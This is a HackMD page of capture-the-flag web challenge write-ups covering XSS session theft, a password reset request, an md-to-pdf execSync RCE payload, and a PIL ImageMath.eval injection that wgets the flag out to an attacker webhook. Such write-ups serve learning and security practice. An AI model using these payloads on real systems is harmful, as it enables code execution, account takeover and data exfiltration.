Web - HackMD

# Web ## Kryptos Vault - h3cko The Ticket System is vulnerable to xss. In the Background a headless browser is viewing the tickets. After digging into the application you can get the users JWT session token via XSS. If you have a closer look to the Backend site via the XSS request you will see that there is another Page `/Settings` and a corresponding JS File to make the page function: `http://46.101.59.228:32680/static/js/settings.js`. It is possible to update the password of the Moderator via this endpoint using the JWT: ~~~ POST /api/users/update HTTP/1.1 Host: 46.101.59.228:32680 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0 Content-Type: application/json Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI1NTM1MjB9.Dxm6QvRflpHNA5c45rFbqwa6BlURV4hHDw2KA0Q3GqY Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Length: 57 { "password": "mystronpassword123!", "uid": "100" } ~~~ You are now able to access the Backend as Moderator. Some Sensitive Information regarding 2 Users Krypto vault: ~~~ I have lost my rfid for the vault. My vault serial is 000083921. Please send me a new rfid. Vault 000076439 requires maintenance. ~~~ But nothing further to do on this site. There is still this "password Reset"-Endpoint which does not require you to provide a username but just an ID. After trying some IDs I noticed that it is possible to reset password for User ID "1" which is the `admin` After you logged in as `admin` you can grab the Flag :) ## Blinker Fluids - h3cko POC: ``` ---js ((require("child_process")).execSync("cat /flag.txt > /app/static/invoices/f0daa85f-b9de-4b78-beff-2f86e242d6ac.txt")) ---RCE ``` reference: https://github.com/simonhaenisch/md-to-pdf/issues/99 You can retrieve the flag afterwards on `http://<url>:<Port>/static/invoices/f0daa85f-b9de-4b78-beff-2f86e242d6ac.txt` ## Amidst Us - Matixx22 Looking at the source code we see that they are using a `PIL` package. There is a vulnerable function `ImageMath.eval` in `utils.py` (`CVE-2022-22817`). ```python alpha = ImageMath.eval( f'''float( max( max( max( difference1(red_band, {color[0]}), difference1(green_band, {color[1]}) ), difference1(blue_band, {color[2]}) ), max( max( difference2(red_band, {color[0]}), difference2(green_band, {color[1]}) ), difference2(blue_band, {color[2]}) ) ) )''', ``` Since in a request we can control a backgroud parameter we can execute commands. Lets grab a flag into a environment variable and pass it to the webhook as parameter. (I've used ngrok proxy and python server to see a parameter). Put it in a one of the backgrounds' fields: ![](https://i.imgur.com/S6MVaI7.png) Payload: ``"exec('import os;os.system(\"TEMP=$(cat ../flag.txt);wget https://<some_kind_of_webhook>/?result=${TEMP}\")')"`` Make a request and get the flag. ![](https://i.imgur.com/6J8ovND.png) Flag: `HTB{i_slept_my_way_to_rce}`